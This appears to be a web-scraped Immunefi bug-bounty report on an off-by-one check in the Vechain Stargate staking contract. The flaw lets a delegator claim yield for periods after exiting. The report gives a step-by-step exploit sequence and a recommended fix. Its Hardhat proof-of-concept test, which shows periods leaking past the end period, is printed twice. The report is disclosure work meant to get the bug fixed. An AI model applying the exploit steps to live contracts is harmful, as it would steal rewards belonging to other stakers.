59752 sc high off by one bug in claimabledelegationperiods allows claiming yield for periods after exit

Submitted on Nov 15th 2025 at 14:32:56 UTC by @Paludo0x for Audit Comp | Vechain | Stargate Hayabusa

Report ID: #59752
Report Type: Smart Contract
Report severity: High
Target: https://github.com/immunefi-team/audit-comp-vechain-stargate-hayabusa/tree/main/packages/contracts/contracts/Stargate.sol
Impacts: Theft of unclaimed yield

Description

Brief / Intro

A boundary check error in Stargate::_claimableDelegationPeriods() can cause the contract to return an upper bound that extends beyond a delegation's recorded endPeriod.

If exploited, an attacker can claim reward periods after they have exited delegation.

Vulnerability Details

The function _claimableDelegationPeriods() distinguishes between "ended" vs "active" delegations using a > comparison that does not include the equality case endPeriod == nextClaimablePeriod.

Relevant snippet:

        // check first for delegations that ended
        // endPeriod is not max if the delegation is exited or requested to exit
        // if the endPeriod is before the current validator period, it means the delegation ended
        // because if its equal it means they requested to exit but the current period is not over yet
        if (
            endPeriod != type(uint32).max &&
            endPeriod < currentValidatorPeriod &&
            endPeriod > nextClaimablePeriod
        ) {
            return (nextClaimablePeriod, endPeriod);
        }

        // check that the start period is before the current validator period
        // and if it is, return the start period and the current validator period.
        // we use "less than" because if we use "less than or equal", even
        // if the delegation started, the current period rewards are not claimable
        if (nextClaimablePeriod < currentValidatorPeriod) {
            return (nextClaimablePeriod, completedPeriods);
        }

When nextClaimablePeriod == endPeriod, the logic falls through to the "active" branch and returns (nextClaimablePeriod, completedPeriods).

If completedPeriods is greater than endPeriod at that moment, the function allows iterating and computing rewards for periods strictly greater than endPeriod.

Exploit sequence is described below.

Stake and delegate

Stake and delegate an NFT tokenId.

Arrange last claimed and request exit

Ensure lastClaimedPeriod == endPeriod - 1 (typically achieved by claiming up to the previous period). Call requestDelegationExit(tokenId), which sets endPeriod to the exit period.

Advance validator periods

Wait for the validator to advance completedPeriods beyond P.

Claim rewards

Call claimRewards(tokenId). The vulnerable logic returns [endPeriod, completedPeriods] instead of [endPeriod, endPeriod] and the contract computes rewards including periods after exit.

Impact Details

Classified as High — Theft of unclaimed yield.

Attackers who arrange the timing can receive rewards for periods after their delegation ended. The stolen value equals the sum of rewards allocated to those periods after exit that the ProtocolStaker reports as payable to delegators.

Recommended Fix

Apply a targeted fix in _claimableDelegationPeriods so that the ended delegation branch handles the equality case (i.e., include the equality when comparing endPeriod and nextClaimablePeriod).

Suggested minimal change: ensure the ended-delegation branch includes endPeriod >= nextClaimablePeriod (or otherwise treat the == case as ended) so the returned last-claimable period never exceeds endPeriod.

Proof of Concept

Unit test PoC (to paste in Delegation.test.ts)

This is the log from the test:

  shard-u2: Stargate: Delegation

[EXIT INVARIANT] endPeriodAfterExit: 6 
currentValidatorPeriod: 120n 
nextClaimablePeriod: 6 
lastClaimablePeriod: 14
    ✔ should not expose claimable periods after delegation exit (regression for _claimableDelegationPeriods off-by-one)


  1 passing (2s)

Test code used:

it.only("should not expose claimable periods after delegation exit (regression for _claimableDelegationPeriods off-by-one)", async () => {
    const levelSpec = await stargateNFTMock.getLevel(LEVEL_ID);

    // 1. Stake and delegate
    await (
        await stargateContract.connect(user).stake(LEVEL_ID, {
            value: levelSpec.vetAmountRequiredToStake,
        })
    ).wait();

    const tokenId = await stargateNFTMock.getCurrentTokenId();

    await (await stargateContract.connect(user).delegate(tokenId, validator.address)).wait();

    // Bring delegation into ACTIVE state with completed periods = 5
    const initialCompleted = 5;
    await (
        await protocolStakerMock.helper__setValidationCompletedPeriods(
            validator.address,
            initialCompleted
        )
    ).wait();
    expect(await stargateContract.getDelegationStatus(tokenId)).to.equal(
        DELEGATION_STATUS_ACTIVE
    );

    // Claim all rewards so lastClaimedPeriod == initialCompleted
    await (await stargateContract.connect(user).claimRewards(tokenId)).wait();

    // 2. User requests exit -> endPeriod becomes current validator period (initialCompleted + 1)
    await (await stargateContract.connect(user).requestDelegationExit(tokenId)).wait();

    const delegationId = await stargateContract.getDelegationIdOfToken(tokenId);
    const [, endPeriodAfterExit] = await protocolStakerMock.getDelegationPeriodDetails(
        delegationId
    );

    // Sanity: there should be no claimable periods immediately after exit
    const [, lastClaimableAfterExitBeforeAdvance] =
        await stargateContract.claimableDelegationPeriods(tokenId);
    expect(lastClaimableAfterExitBeforeAdvance).to.equal(0);

    // 3. Advance validator periods far beyond endPeriod (simulating validator progressing)
    const completedAfter = Number(endPeriodAfterExit) + 8;
    await (
        await protocolStakerMock.helper__setValidationCompletedPeriods(
            validator.address,
            completedAfter
        )
    ).wait();

    // 4. Claimable periods should remain capped at endPeriod but instead leak to completedAfter
    const [nextClaimableAfterExit, lastClaimableAfterExit] = await stargateContract.claimableDelegationPeriods(
        tokenId
    );
    const [currentValidatorPeriodAfterAdvance] = await protocolStakerMock.getValidationPeriodDetails(
        validator.address
    );
    log(
        "\n[EXIT INVARIANT]",
        "endPeriodAfterExit:",
        endPeriodAfterExit.toString(),
        "\ncurrentValidatorPeriod:",
        currentValidatorPeriodAfterAdvance,
        "\nnextClaimablePeriod:",
        nextClaimableAfterExit.toString(),
        "\nlastClaimablePeriod:",
        lastClaimableAfterExit.toString()
    );

    expect(lastClaimableAfterExit > endPeriodAfterExit).to.equal(
        true,
        "claimableDelegationPeriods leaked periods after delegation end"
    );
});

Previous59742 sc high user funds get stucked in the contract when validators exits Next59756 sc high exiting delegators stakes can be bricked permanently by the validator signaling an exit after them in the same period

Was this helpful?

it.only("should not expose claimable periods after delegation exit (regression for _claimableDelegationPeriods off-by-one)", async () => { const levelSpec = await stargateNFTMock.getLevel(LEVEL_ID); // 1. Stake and delegate await ( await stargateContract.connect(user).stake(LEVEL_ID, { value: levelSpec.vetAmountRequiredToStake, }) ).wait(); const tokenId = await stargateNFTMock.getCurrentTokenId(); await (await stargateContract.connect(user).delegate(tokenId, validator.address)).wait(); // Bring delegation into ACTIVE state with completed periods = 5 const initialCompleted = 5; await ( await protocolStakerMock.helper__setValidationCompletedPeriods( validator.address, initialCompleted ) ).wait(); expect(await stargateContract.getDelegationStatus(tokenId)).to.equal( DELEGATION_STATUS_ACTIVE ); // Claim all rewards so lastClaimedPeriod == initialCompleted await (await stargateContract.connect(user).claimRewards(tokenId)).wait(); // 2. User requests exit -> endPeriod becomes current validator period (initialCompleted + 1) await (await stargateContract.connect(user).requestDelegationExit(tokenId)).wait(); const delegationId = await stargateContract.getDelegationIdOfToken(tokenId); const [, endPeriodAfterExit] = await protocolStakerMock.getDelegationPeriodDetails( delegationId ); // Sanity: there should be no claimable periods immediately after exit const [, lastClaimableAfterExitBeforeAdvance] = await stargateContract.claimableDelegationPeriods(tokenId); expect(lastClaimableAfterExitBeforeAdvance).to.equal(0); // 3. Advance validator periods far beyond endPeriod (simulating validator progressing) const completedAfter = Number(endPeriodAfterExit) + 8; await ( await protocolStakerMock.helper__setValidationCompletedPeriods( validator.address, completedAfter ) ).wait(); // 4. Claimable periods should remain capped at endPeriod but instead leak to completedAfter const [nextClaimableAfterExit, lastClaimableAfterExit] = await stargateContract.claimableDelegationPeriods( tokenId ); const [currentValidatorPeriodAfterAdvance] = await protocolStakerMock.getValidationPeriodDetails( validator.address ); log( "\n[EXIT INVARIANT]", "endPeriodAfterExit:", endPeriodAfterExit.toString(), "\ncurrentValidatorPeriod:", currentValidatorPeriodAfterAdvance, "\nnextClaimablePeriod:", nextClaimableAfterExit.toString(), "\nlastClaimablePeriod:", lastClaimableAfterExit.toString() ); expect(lastClaimableAfterExit > endPeriodAfterExit).to.equal( true, "claimableDelegationPeriods leaked periods after delegation end" ); });

hashtagDescription

hashtagBrief / Intro

hashtagVulnerability Details

hashtagStake and delegate

hashtagArrange last claimed and request exit

hashtagAdvance validator periods

hashtagClaim rewards

hashtagImpact Details

hashtagRecommended Fix

hashtagProof of Concept